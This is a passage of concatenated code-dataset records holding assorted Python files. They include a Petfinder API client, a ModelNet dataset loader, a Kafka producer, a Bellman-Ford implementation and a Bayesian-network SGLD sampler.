out\n","repo_name":"MtKanjon/kenku","sub_path":"cogs/crow/crow_wide.py","file_name":"crow_wide.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"12849472268","text":"import json\nimport client as cl\nimport os\n\n#----------------------------------------Tester Default Definitions-------------------------------\nTEST_CONFIG = \"TEST_CONFIG.json\"\nITERATION = 100\n#-------------------------------------------------------------------------------------------------\n\n# default test config\ndef defaultTest():\n TestConfig = {\n \"IMAGE\":{\n \"host\":\"localhost\",\n \"port\":\"1337\",\n \"file\":\"pic.jpg\"\n },\n \"TEXT\":{\n \"host\":\"localhost\",\n \"port\":\"1337\",\n \"file\":\"test.txt\",\n }\n }\n return TestConfig\n\n# tester runs client for n interations with given config\ndef tester(config):\n # running interation of client to check for errors\n host = config[\"host\"]\n port = int(config[\"port\"])\n filename = config[\"file\"]\n if \"iteration\" in config:\n iteration = int(config[\"iteration\"])\n else:\n iteration = ITERATION\n \n for i in range(iteration):\n try:\n cl.client(host, port, filename)\n \n except Exception as error_message:\n log.write(f\"- Iteration: {i} - ERROR: {error_message}\\n\")\n\nif __name__ == \"__main__\":\n if os.path.isfile(TEST_CONFIG):\n with open(TEST_CONFIG, \"r\") as configFile:\n allConfig = json.load(configFile)\n else:\n # creates test config from default tests\n allConfig = defaultTest()\n with open(TEST_CONFIG, \"w\") as configFile:\n json.dump(allConfig, configFile, indent = 4)\n\n for config in allConfig:\n logfile = f\"TEST_LOG_{config}.txt\"\n with open(logfile, \"a\") as log:\n tester(allConfig[config])","repo_name":"ismailfaruk/ECSE416--Telecommunication-Networks","sub_path":"LAB_1/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6202627493","text":"# -*- coding: utf-8 -*-\n\nfrom celery.bin import worker\n\nfrom app import create_app, celery\n\napp = create_app()\napp.app_context().push()\n\n\nif __name__ == '__main__':\n\n with app.app_context():\n worker = worker.worker(app=celery)\n\n worker.run(loglevel=\"info\", queues=[\"anti_q\", ])\n","repo_name":"leolinf/flask-demo","sub_path":"risk/celery_app.py","file_name":"celery_app.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38705816829","text":"import os\nimport glob\nimport cc3d\n\nfrom skimage import io, transform\nfrom torch.utils.data import Dataset\nfrom copy import copy\n\nfrom graphics import Voxelgrid\n\nfrom scipy.ndimage.morphology import binary_dilation\n\nfrom utils.data import *\n\nfrom dataset.binvox_utils import read_as_3d_array\n\n\nclass ModelNet(Dataset):\n\n def __init__(self, config):\n\n self.root_dir = os.path.expanduser(config.root_dir)\n\n self.resolution = (config.resy, config.resx)\n self.xscale = self.resolution[0] / 480.\n self.yscale = self.resolution[1] / 640.\n\n self.transform = config.transform\n\n self.scene_list = config.scene_list\n\n self.noise_scale = config.noise_scale\n self.outlier_scale = config.outlier_scale\n self.outlier_fraction = config.outlier_fraction\n\n self.grid_resolution = config.grid_resolution\n\n self.split = 'test'\n\n self._load_frames()\n\n def _load_frames(self):\n\n self._scenes 
= []\n self.frames = []\n\n with open(self.scene_list, 'r') as file:\n\n for line in file:\n try:\n scene, obj = line.rstrip().split('\\t')\n except:\n scene, obj = line.rstrip().split(' ')\n\n self._scenes.append(os.path.join(scene, obj))\n\n path = os.path.join(self.root_dir, scene, self.split, obj,\n 'data', '*.depth.png')\n files = glob.glob(path)\n for i, f in enumerate(files):\n self.frames.append(f.replace('.depth.png', ''))\n\n def __len__(self):\n return len(self.frames)\n\n def __getitem__(self, item):\n frame = self.frames[item]\n\n pathsplit = frame.split('/')\n sc = pathsplit[-5]\n obj = pathsplit[-3]\n scene_id = '{}/{}'.format(sc, obj)\n sample = {}\n\n frame_id = frame.split('/')[-1]\n frame_id = int(frame_id)\n sample['frame_id'] = frame_id\n\n depth = io.imread('{}.depth.png'.format(frame))\n depth = depth.astype(np.float32)\n depth = depth / 1000.\n # depth[depth == np.max(depth)] = 0.\n\n step_x = depth.shape[0] / self.resolution[0]\n step_y = depth.shape[1] / self.resolution[1]\n\n index_y = [int(step_y * i) for i in\n range(0, int(depth.shape[1] / step_y))]\n index_x = [int(step_x * i) for i in\n range(0, int(depth.shape[0] / step_x))]\n\n depth = depth[:, index_y]\n depth = depth[index_x, :]\n\n mask = copy(depth)\n mask[mask == np.max(depth)] = 0\n mask[mask != 0] = 1\n original_mask = copy(mask)\n sample['original_mask'] = copy(mask)\n gradient_mask = binary_dilation(mask, iterations=5)\n mask = binary_dilation(mask, iterations=8)\n sample['mask'] = mask\n sample['gradient_mask'] = gradient_mask\n\n depth[mask == 0] = 0\n\n sample['depth'] = depth\n sample['noisy_depth'] = add_kinect_noise(copy(depth),\n sigma_fraction=self.noise_scale)\n sample['noisy_depth_octnetfusion'] = add_depth_noise(copy(depth),\n noise_sigma=self.noise_scale,\n seed=42)\n sample['outlier_depth'] = add_outliers(\n copy(sample['noisy_depth_octnetfusion']),\n scale=self.outlier_scale,\n fraction=self.outlier_fraction)\n\n #sample['sparse_depth'] = add_sparse_depth(copy(depth), percentage=0.01)\n sample['outlier_blob_depth'] = add_outlier_blobs(copy(sample['noisy_depth_octnetfusion']),\n scale=self.outlier_scale,\n fraction=self.outlier_fraction)\n\n intrinsics = np.loadtxt('{}.intrinsics.txt'.format(frame))\n # adapt intrinsics to camera resolution\n scaling = np.eye(3)\n scaling[1, 1] = self.yscale\n scaling[0, 0] = self.xscale\n\n sample['intrinsics'] = np.dot(scaling, intrinsics)\n\n extrinsics = np.loadtxt('{}.extrinsics.txt'.format(frame))\n extrinsics = np.linalg.inv(extrinsics)\n sample['extrinsics'] = extrinsics\n\n sample['scene_id'] = scene_id\n\n for key in sample.keys():\n if type(sample[key]) is not np.ndarray and type(\n sample[key]) is not str:\n sample[key] = np.asarray(sample[key])\n\n if self.transform:\n sample = self.transform(sample)\n\n return sample\n @property\n def scenes(self):\n return self._scenes\n\n def get_grid(self, scene):\n\n sc, obj = scene.split('/')\n if self.grid_resolution == 256:\n filepath = os.path.join(self.root_dir, sc, self.split, obj,\n 'voxels', '*.binvox')\n else:\n filepath = os.path.join(self.root_dir, sc, self.split, obj,\n 'voxels', '*.{}.binvox'.format(\n self.grid_resolution))\n\n filepath = glob.glob(filepath)[0]\n\n # filepath = os.path.join(self.root_dir, 'example', 'voxels', 'chair_0256.binvox')\n\n with open(filepath, 'rb') as file:\n volume = read_as_3d_array(file)\n\n array = volume.data.astype(np.int)\n\n # clean occupancy grids from artifacts\n labels_out = cc3d.connected_components(array) # 26-connected\n N = np.max(labels_out)\n 
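# keep only the largest connected component; smaller blobs are treated as voxel artifacts\n 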
max_label = 0\n max_label_count = 0\n for segid in range(1, N + 1):\n extracted_image = labels_out * (labels_out == segid)\n extracted_image[extracted_image != 0] = 1\n label_count = np.sum(extracted_image)\n if label_count > max_label_count:\n max_label = segid\n max_label_count = label_count\n array[labels_out != max_label] = 0.\n\n resolution = 1. / self.grid_resolution\n\n grid = Voxelgrid(resolution)\n bbox = np.zeros((3, 2))\n bbox[:, 0] = volume.translate\n bbox[:, 1] = bbox[:, 0] + resolution * volume.dims[0]\n\n grid.from_array(array, bbox)\n\n return grid\n","repo_name":"weders/RoutedFusion","sub_path":"dataset/modelnet.py","file_name":"modelnet.py","file_ext":"py","file_size_in_byte":6269,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"53"} +{"seq_id":"72290809128","text":"import requests\nimport os\nfrom flask import request\nimport json\n\n\nAPI_KEY = os.environ['PETFINDER_KEY']\nSECRET_KEY = os.environ['PETFINDER_SECRET']\n\ndef get_token():\n \"\"\"Returns authorization token from petfinder\"\"\"\n \n url = \"https://api.petfinder.com/v2/oauth2/token\"\n data = {'grant_type': 'client_credentials',\n 'client_id': API_KEY,\n 'client_secret': SECRET_KEY}\n response = requests.post(url, data=data)\n res = response.json()\n token = res['token_type'] + ' ' + res['access_token']\n\n return token\n\n\ndef get_breeds():\n \"\"\"returns possible cat breed parameters\"\"\"\n \n token = get_token()\n atype = 'cat'\n url = 'https://api.petfinder.com/v2/types/'+ atype +'/breeds'\n headers = {'Authorization': token}\n payload = {'type': atype}\n response = requests.get(url, headers=headers, params=payload)\n data = response.json()\n breeds = {}\n breeds['breeds'] = []\n for breed in data['breeds']:\n breeds['breeds'].append(breed['name'])\n\n return breeds\n\n\ndef get_colors():\n \"\"\"returns possible coat colors\"\"\"\n\n token = get_token()\n url = 'https://api.petfinder.com/v2/types'\n headers = {'Authorization': token}\n response = requests.get(url, headers=headers)\n data = response.json()\n colors = {}\n for color in data['types']:\n if color['name'] == 'Cat':\n colors['colors'] = color['colors']\n\n return colors\n\n\ndef search_petfinder():\n \"\"\"Return API response based on user search input, get animals endpoint\"\"\"\n \n token = get_token()\n url = 'https://api.petfinder.com/v2/animals'\n headers = {'Authorization': token}\n location_search = request.form.get('search')\n miles = int(request.form.get('miles', '100'))\n size = request.form.get('thickness', '')\n color = request.form.get('color', '')\n breed = request.form.get('breed', '')\n coat = request.form.get('coat', '')\n gender = request.form.get('gender', '')\n\n if color == 'Color':\n color = ''\n if breed == 'Breed': \n breed = ''\n if coat == 'Coat Length': \n coat = ''\n if gender == 'Gender': \n gender = ''\n\n payload = {'type': 'Cat',\n 'limit': 25, \n 'location': location_search,\n 'color': color,\n 'distance': miles,\n 'breed': breed,\n 'coat': coat,\n 'gender': gender,\n 'size': size}\n print('COLOR2', color)\n response = requests.get(url, headers=headers, params=payload)\n data = response.json() \n \n return data\n\n\ndef search_data_map():\n \"\"\"Mapping function to extract relevant information from search_petfinder\"\"\"\n \n fatty_dict = {}\n cats = search_petfinder()\n for cat in cats['animals']:\n if cat['photos'] != []:\n fatty_dict[cat['id']] = {\n 'cat_id': cat['id'],\n 'name': cat['name'], \n 'gender': cat['gender'],\n 'breed': 
cat['breeds']['primary'],\n 'shelter_id': cat['organization_id'], \n 'photo_url': {'medium': cat['photos'][0]['medium'], \n 'large': cat['photos'][0]['large']},\n 'coat_len': cat['coat'],\n 'color': cat['colors']['primary'],\n 'extra_love': cat['attributes']['special_needs'],\n 'environment': {'kids': cat['environment']['children'],\n 'dogs': cat['environment']['dogs'],\n 'cats': cat['environment']['cats']}\n }\n\n return fatty_dict\n\n\ndef fake_cat_data_map():\n \"\"\"Fake cat data with dynamic filtering\"\"\"\n\n location_search = request.form.get('search')\n miles = int(request.form.get('miles', '100'))\n size = request.form.get('thickness', 'large,xlarge')\n color = request.form.get('color', 'Color')\n breed = request.form.get('breed', 'Breed')\n coat = request.form.get('coat', 'Coat Length')\n gender = request.form.get('gender', 'Gender')\n\n fatty_dict = {}\n fatty_filter = {}\n chonk_filter = {}\n for cat in open('fakeChonksForFun.txt'):\n cat = cat.rstrip()\n cat = cat.split('|')\n fatty_dict[cat[0]] = {'cat_id': cat[0],\n 'name': cat[1],\n 'gender': cat[2],\n 'breed': cat[3],\n 'shelter_id': cat[4],\n 'photo_url': {'medium': cat[5],\n 'large': ''},\n 'coat_len': cat[6],\n 'color': cat[7],\n 'extra_love': cat[8],\n 'environment': {'kids': cat[9],\n 'dogs': cat[10],\n 'cats': cat[11]},\n 'size': cat[12]}\n\n if ((breed == 'Breed' and color == 'Color' and coat == 'Coat Length' and \n gender == 'Gender' and size == 'large,xlarge') or (not breed and not color \n and not coat and not gender and size)):\n return fatty_dict\n\n else:\n b = breed == 'Breed'\n cl = color == 'Color'\n g = gender == 'Gender'\n ct = coat == 'Coat Length'\n s = size == 'large,xlarge'\n for c_id, info in fatty_dict.items():\n col = info['color'] == color\n bre = info['breed'] == breed\n cot = info['coat_len'] == coat\n gen = info['gender'] == gender\n si = info['size'] == size\n if ((col and bre and cot and gen and si) or\n (b and col and cot and gen and si) or (cl and bre and cot and gen and si) or \n (ct and col and bre and gen and si) or (g and col and cot and bre and si) or\n (s and col and cot and bre and gen) or (b and cl and cot and g and s) or \n (b and col and ct and g and s) or (bre and cl and ct and g and s) or\n (b and cl and ct and g and si) or (b and cl and ct and gen and s) or\n (b and cl and cot and gen and si) or (b and col and ct and gen and si) or\n (b and col and cot and g and si) or (cl and b and cot and gen and si) or\n (cl and bre and ct and gen and si) or (cl and bre and cot and g and si) or \n (ct and b and col and gen and si) or (ct and bre and cl and gen and si) or\n (ct and bre and col and g and si) or (g and b and col and cot and si) or\n (g and bre and cl and cot and si) or (g and bre and col and ct and si) or \n (s and b and col and cot and si and gen) or (s and bre and cl and cot and si and gen) or\n (s and bre and col and ct and si and gen) or (b and cl and ct and gen and si) or\n (b and cl and cot and g and si) or (b and col and ct and g and si) or\n (b and col and cot and g and s) or (cl and b and ct and gen and si) or\n (cl and b and cot and g and si) or (cl and bre and ct and g and si) or\n (cl and bre and cot and g and s) or (ct and b and cl and gen and si) or\n (ct and b and col and g and si) or (ct and bre and cl and g and si) or\n (ct and bre and col and g and s) or (g and b and cl and cot and si) or\n (g and b and col and ct and si) or (g and bre and cl and ct and si) or\n (g and bre and col and ct and s) or (s and b and cl and cot and gen) or\n (s and b and col and ct 
and gen) or (s and bre and cl and ct and gen) or\n (s and bre and col and ct and g)): \n fatty_filter[c_id] = info\n if fatty_filter:\n return fatty_filter\n\n\ndef shelter_info(shelter_id):\n \"\"\"Return API response for shelter information using the organization ID \n associated to the cat from search_petfinder, get organization endpoint\"\"\"\n \n token = get_token()\n url = 'https://api.petfinder.com/v2/organizations/' + shelter_id\n headers = {'Authorization': token}\n payload = {'id': shelter_id}\n response = requests.get(url, headers=headers, params=payload)\n data = response.json()\n \n return data\n\n\ndef shelter_data_map(shelter_id):\n \"\"\"Mapping function to extract relevant information from shelter_info\"\"\"\n\n shelter_details = {}\n shelter = shelter_info(shelter_id)\n org = shelter['organization']\n \n shelter_details[org['id']] = {\n 'shelter_id': org['id'],\n 'name': org['name'],\n 'phone': org['phone'],\n 'email': org['email'],\n 'url': org['url'],\n 'location': {'address': org['address']['address1'],\n 'city': org['address']['city'],\n 'state': org['address']['state'],\n 'zipcode': org['address']['postcode'],\n 'country': org['address']['country']}\n }\n\n return shelter_details\n\n\n","repo_name":"atray1/Chonkers","sub_path":"petfinder.py","file_name":"petfinder.py","file_ext":"py","file_size_in_byte":9362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1399645978","text":"n=int(input())\r\nfactorial=1\r\nif n<0:\r\n print(\"Number must be positive\")\r\nelif n==0:\r\n print(\"factorial=1\")\r\nelse:\r\n for a in range(1,n+1):\r\n factorial=factorial*a\r\n\r\nprint(factorial)","repo_name":"Akash5210/Python","sub_path":"factorial_using_for_loop.py","file_name":"factorial_using_for_loop.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4939944222","text":"import string\nimport shutil\nimport os\nimport time\nfrom matplotlib import pyplot as plt\nfrom queue import Queue\nimport threading\n\n# Function to Convert the File to Upper Case\ndef task(filename):\n inputFile = open(f\"./input/{filename}\", \"r\")\n content = inputFile.read()\n outputFile = open(f\"./output/{filename}\", \"w\")\n outputFile.write(content.upper()) \n\n \n# Function to send task to threads\ndef do_stuff(q):\n while not q.empty():\n value = q.get()\n task(value)\n q.task_done()\n\n# Step 1 : Generate a 10 MB Text File \n\nf = open(\"temp.txt\",'w')\n\nalphabets = string.ascii_letters\n\nfor i in range(200000):\n f.writelines(alphabets + '\\n')\n\n# Step 2 : Create 50 Files\nos.mkdir(f'input')\nfor j in range(100):\n shutil.copyfile(src='temp.txt',dst=f'./input/temp{j}.txt')\n\n\n# Step 3 : Convert Given Files to Upper Case and Note Time Taken\ndata = {}\n\nfor t in [j*5 for j in range(1,5)]:\n jobs = Queue()\n os.mkdir('output')\n for elem in os.listdir('input'):\n jobs.put(elem)\n start = time.time()\n for i in range(t):\n worker = threading.Thread(target=do_stuff, args=(jobs,))\n worker.start()\n \n jobs.join()\n end = time.time()\n print(t, end - start)\n data[t] = end - start\n shutil.rmtree('output')\n\n\n# Step 4 : Plot the required Data\nprint(data)\n\nplt.plot(list(data.keys()),list(data.values()))\nplt.xlabel(\"Number of threads\")\nplt.ylabel(\"Time Taken\")\nplt.title(\"Time taken to convert to 500 files to Upper Case\")\nplt.show()","repo_name":"dragonman164/Mini-Projects","sub_path":"Lower Case to Upper (MultiThreading 
Solution)/mainscript.py","file_name":"mainscript.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"33876225758","text":"from django.urls import path\r\n\r\nfrom .views import (\r\n QueryView, SuccessView, TrackingView, Feedback\r\n)\r\n\r\nurlpatterns = [\r\n path('feedback/', Feedback.as_view(), name='feedback'),\r\n path('query/', QueryView.as_view(), name='query'),\r\n path('success/', SuccessView.as_view(), name='querysuccess'),\r\n path('tracker/', TrackingView.as_view(), name='tracking'),\r\n]\r\n","repo_name":"deepak3081996/artisticripples","sub_path":"contact/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43615230918","text":"def bellman_ford(grafo, source):\r\n distancia, ant = dict(), dict()\r\n for j in grafo:\r\n distancia[j], ant[j] = float('inf'), None\r\n distancia[source] = 0\r\n\r\n for _ in range(len(grafo) - 1):\r\n for j in grafo:\r\n for i in grafo[j]:\r\n if distancia[i] > distancia[j] + grafo[j][i]:\r\n distancia[i], ant[i] = distancia[j] + grafo[j][i], j\r\n\r\n for j in grafo:\r\n for i in grafo[j]:\r\n assert distancia[i] <= distancia[j] + grafo[j][i]\r\n\r\n return distancia, ant\r\n \r\nif __name__ == '__main__':\r\n grafo = {\r\n 'a': {'b': -1, 'c': 4},\r\n 'b': {'c': 3, 'd': 2, 'e': 2},\r\n 'c': {},\r\n 'd': {'b': 1, 'c': 5},\r\n 'e': {'d': -3}\r\n }\r\n\r\n distancia, ant = bellman_ford(grafo, source='a')\r\n\r\n print(distancia)\r\n \r\n grafo = {\r\n 'a': {'c': 3},\r\n 'b': {'a': 2},\r\n 'c': {'b': 7, 'd': 1},\r\n 'd': {'a': 6},\r\n }\r\n \r\n distancia, ant = bellman_ford(grafo, source='a')\r\n\r\n print(distancia)","repo_name":"drewneres/IFG","sub_path":"bellman_ford.py","file_name":"bellman_ford.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74191045929","text":"from inspect import _void\nimport json\nfrom multiprocessing.sharedctypes import Value\nfrom time import sleep\nimport logging\nimport random\nimport string\n\nfrom kafka import KafkaProducer\n\ntopic_name = 'test-topic'\n\nproducer = KafkaProducer (\n bootstrap_servers='localhost:9092',\n value_serializer=lambda v: json.dumps(v).encode('utf-8')\n)\n\ndef on_send_success(metadata):\n print('messages sent')\n \ndef on_send_failure(ex):\n print(ex)\n logging.error('[ERROR] Error occured while sending message', exc_info=ex)\n\ndef random_string(len: int) -> str:\n return ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(len))\n\ndef run(seconds: int, number_of_messages: int) -> None:\n assert seconds >= 0, 'seconds can\\'t be negative'\n assert number_of_messages > 0, 'number of messages must be greater than 0'\n s = 0\n while s < seconds:\n for i in range(number_of_messages):\n producer.send(topic_name, {\"x\": random_string(8)}).add_callback(on_send_success).add_errback(on_send_failure)\n try:\n producer.flush()\n except:\n print('Error while flushing')\n break\n s += 1\n sleep(1)\n\nif __name__ == '__main__':\n run(2, 1)\n producer.close()\n \n","repo_name":"Backss4/apache-kafka-test","sub_path":"src/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23241499165","text":"# 
Given the root node of a binary tree, return the sum of all of its left leaves.\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n# recurse on the left and right subtrees separately\nclass Solution:\n def sumOfLeftLeaves(self, root: Optional[TreeNode]) -> int:\n if not root:\n return 0\n leftSum = self.sumOfLeftLeaves(root.left)\n rightSum = self.sumOfLeftLeaves(root.right)\n\n currentVal = 0\n if root.left and not root.left.left and not root.left.right:\n currentVal = root.left.val\n return leftSum + rightSum + currentVal\n\n\"\"\"\n# second pass\nclass Solution:\n def __init__(self):\n self.total = 0\n\n def sumOfLeftLeaves(self, root: Optional[TreeNode]) -> int:\n def traversal(root):\n if not root:\n return \n if root.left and not root.left.left and not root.left.right:\n self.total += root.left.val\n traversal(root.left)\n traversal(root.right)\n traversal(root)\n return self.total\n\"\"\"","repo_name":"vandeppce/algorithm","sub_path":"7.binary tree/404*SumOfLeftLeaves.py","file_name":"404*SumOfLeftLeaves.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72040215527","text":"from tqdm import tqdm\nimport torch\nfrom .utils import get_cosine_schedule\nfrom . import mcmc\nimport math\nfrom .exp_utils import evaluate_model\n\n\nclass SGLDRunner:\n def __init__(self, model, dataloader, dataloader_test, epochs_per_cycle, warmup_epochs,\n sample_epochs, learning_rate=1e-2, skip=1, metrics_skip=1,\n temperature=1., data_mult=1., momentum=0., sampling_decay=True,\n grad_max=1e6, cycles=1, precond_update=None,\n metrics_saver=None, model_saver=None, reject_samples=False):\n \"\"\"Stochastic Gradient Langevin Dynamics for posterior sampling.\n\n On calling `run`, this class runs SGLD for `cycles` sampling cycles. In\n each cycle, there are 3 phases: descent, warmup and sampling. The cycle\n lasts for `epochs_per_cycle` epochs in total, and the warmup and\n sampling phases last for `warmup_epochs` and `sample_epochs` epochs\n respectively.\n\n The descent phase performs regular gradient descent with momentum, i.e.\n SGLD with temperature=0. The warmup phase raises the temperature to 1.\n During the sample phase, samples get stored.\n\n The learning rate keeps decreasing all throughout the cycle following a\n cosine function, from learning_rate=1 at the beginning to\n learning_rate=0 at the end.\n\n The preconditioner gets updated every `precond_update` epochs,\n regardless of the phase in the cycle.\n\n Args:\n model (torch.Module, PriorMixin): BNN model to sample from\n num_data (int): Number of datapoints in the training set\n warmup_epochs (int): Number of epochs per cycle for warming up the Markov chain, at the beginning.\n sample_epochs (int): Number of epochs per cycle where the samples are kept, at the end.\n\n learning_rate (float): Initial learning rate\n skip (int): Number of samples to skip between saved samples during the sampling phase. 
Sometimes called \"thinning\".\n metrics_skip (int): Number of samples to skip between saved metrics of the sampler\n temperature (float): Temperature for tempering the posterior\n data_mult (float): Effective replication of each datapoint (which is the usual approach to tempering in VI).\n momentum (float): Momentum decay parameter for SGLD\n sampling_decay (bool): Flag to control whether the learning rate should decay during sampling\n grad_max (float): maximum absolute magnitude of an element of the gradient\n cycles (int): Number of warmup and sampling cycles to perform\n precond_update (int): Number of steps after which the preconditioner should be updated. None disables the preconditioner.\n metrics_saver : HDF5Metrics to log metric with a certain name and value\n \"\"\"\n self.model = model\n self.dataloader = dataloader\n self.dataloader_test = dataloader_test\n\n assert warmup_epochs >= 0\n assert sample_epochs >= 0\n assert epochs_per_cycle >= warmup_epochs + sample_epochs\n self.epochs_per_cycle = epochs_per_cycle\n self.descent_epochs = epochs_per_cycle - warmup_epochs - sample_epochs\n self.warmup_epochs = warmup_epochs\n self.sample_epochs = sample_epochs\n\n self.skip = skip\n self.metrics_skip = metrics_skip\n # num_samples (int): Number of recorded per cycle\n self.num_samples = sample_epochs // skip\n assert sample_epochs % skip == 0\n\n self.learning_rate = learning_rate\n self.temperature = temperature\n self.eff_num_data = len(dataloader.dataset) * data_mult\n self.momentum = momentum\n self.sampling_decay = sampling_decay\n self.grad_max = grad_max\n self.cycles = cycles\n self.precond_update = precond_update\n self.metrics_saver = metrics_saver\n self.model_saver = model_saver\n if model_saver is None:\n self._samples = {\n name: torch.zeros(torch.Size([self.num_samples*cycles])+p_or_b.shape, dtype=p_or_b.dtype)\n for name, p_or_b in model.state_dict().items()}\n self._samples[\"steps\"] = torch.zeros(torch.Size([self.num_samples*cycles]), dtype=torch.int64)\n\n self.param_names, self._params = zip(*model.named_parameters())\n self.reject_samples = reject_samples\n\n def _make_optimizer(self, params):\n assert self.reject_samples is False, \"SGLD cannot reject samples\"\n return mcmc.SGLD(\n params=params,\n lr=self.learning_rate, num_data=self.eff_num_data,\n momentum=self.momentum, temperature=self.temperature)\n\n def _make_scheduler(self, optimizer):\n if self.sampling_decay is True or self.sampling_decay == \"cosine\":\n schedule = get_cosine_schedule(\n len(self.dataloader) * self.epochs_per_cycle)\n return torch.optim.lr_scheduler.LambdaLR(\n optimizer=optimizer, lr_lambda=schedule)\n elif self.sampling_decay is False or self.sampling_decay == \"stairs\":\n return torch.optim.lr_scheduler.StepLR(\n optimizer, 150*len(self.dataloader), gamma=0.1)\n elif self.sampling_decay == \"flat\":\n # No-op scheduler\n return torch.optim.lr_scheduler.StepLR(optimizer, 2**30, gamma=1.0)\n raise ValueError(f\"self.sampling_decay={self.sampling_decay}\")\n\n def run(self, progressbar=False):\n \"\"\"\n Runs the sampling on the model.\n\n Args:\n x (torch.tensor): Training input data\n y (torch.tensor): Training labels\n progressbar (bool): Flag that controls whether a progressbar is printed\n \"\"\"\n self.optimizer = self._make_optimizer(self._params)\n self.optimizer.sample_momentum()\n self.scheduler = self._make_scheduler(self.optimizer)\n\n self.metrics_saver.add_scalar(\"test/log_prob\", math.nan, step=-1)\n self.metrics_saver.add_scalar(\"test/acc\", math.nan, 
step=-1)\n\n        def _is_sampling_epoch(_epoch):\n            _epoch = _epoch % self.epochs_per_cycle\n            sampling_epoch = _epoch - (self.descent_epochs + self.warmup_epochs)\n            return (0 <= sampling_epoch) and (sampling_epoch % self.skip == 0)\n\n        step = -1  # used for `self.metrics_saver.add_scalar`; incremented to 0 on the first batch and never reset\n        postfix = {}\n        for cycle in range(self.cycles):\n            if progressbar:\n                epochs = tqdm(range(self.epochs_per_cycle), position=0,\n                              leave=True, desc=f\"Cycle {cycle}, Sampling\", mininterval=2.0)\n            else:\n                epochs = range(self.epochs_per_cycle)\n\n            for epoch in epochs:\n                for g in self.optimizer.param_groups:\n                    g['temperature'] = 0. if epoch < self.descent_epochs else self.temperature\n\n                for i, (x, y) in enumerate(self.dataloader):\n                    step += 1\n                    store_metrics = (\n                        i == 0  # The start of an epoch\n                        or step % self.metrics_skip == 0)\n                    initial_step = (\n                        step == 0  # The very first step\n                        or\n                        # This is the first step after a sampling epoch\n                        (i == 0 and _is_sampling_epoch(epoch-1)))\n\n                    loss, acc, delta_energy = self.step(\n                        step, x.to(self._params[0].device).detach(), y.to(self._params[0].device).detach(),\n                        store_metrics=store_metrics,\n                        initial_step=initial_step)\n\n                    if progressbar and store_metrics:\n                        postfix[\"train/loss\"] = loss.item()\n                        postfix[\"train/acc\"] = acc.item()\n                        if delta_energy is not None:\n                            postfix[\"Δₑ\"] = delta_energy\n                        epochs.set_postfix(postfix, refresh=False)\n\n                if self.precond_update is not None and epoch % self.precond_update == 0:\n                    self.optimizer.update_preconditioner()\n\n                state_dict = self.model.state_dict()\n                if _is_sampling_epoch(epoch):\n                    self._save_sample(state_dict, cycle, epoch, step)\n                results = self._evaluate_model(state_dict, step)\n                if progressbar:\n                    postfix.update(results)\n                    epochs.set_postfix(postfix, refresh=False)\n\n                # Important to put here because no new metrics are added\n                # Write metrics to disk every 10 seconds\n                self.metrics_saver.flush(every_s=10)\n\n        # Save metrics for the last sample\n        (x, y) = next(iter(self.dataloader))\n        self.step(step+1,\n                  x.to(self._params[0].device),\n                  y.to(self._params[0].device),\n                  store_metrics=True, initial_step=_is_sampling_epoch(-1))\n\n    def _save_sample(self, state_dict, cycle, epoch, step):\n        # TODO: refactor this into two `model_saver` classes\n        sampling_epoch = epoch - (self.descent_epochs + self.warmup_epochs)\n        if self.model_saver is None:\n            for name, param in state_dict.items():\n                self._samples[name][(self.num_samples*cycle)+(sampling_epoch//self.skip)] = param\n        else:\n            self.model_saver.add_state_dict(state_dict, step)\n            self.model_saver.flush()\n\n    def _evaluate_model(self, state_dict, step):\n        if len(self.dataloader_test) == 0:\n            return {}\n        self.model.eval()\n        state_dict = {k: v.unsqueeze(0) for k, v in state_dict.items()}\n        results = evaluate_model(\n            self.model, self.dataloader_test, state_dict,\n            likelihood_eval=True, accuracy_eval=True, calibration_eval=False)\n        self.model.train()\n\n        results = {\"test/loss\": -results[\"lp_last\"],\n                   \"test/acc\": results[\"acc_last\"]}\n        for k, v in results.items():\n            self.metrics_saver.add_scalar(k, v, step)\n        return results\n\n    def _model_potential_and_grad(self, x, y):\n        self.optimizer.zero_grad()\n        loss, log_prior, potential, accs_batch, _ = self.model.split_potential_and_acc(x, y, self.eff_num_data)\n        potential.backward()\n        for p in self.optimizer.param_groups[0][\"params\"]:\n            p.grad.clamp_(min=-self.grad_max, max=self.grad_max)\n        if torch.isnan(potential).item():\n            raise ValueError(\"Potential is NaN\")\n        return loss, log_prior, potential, 
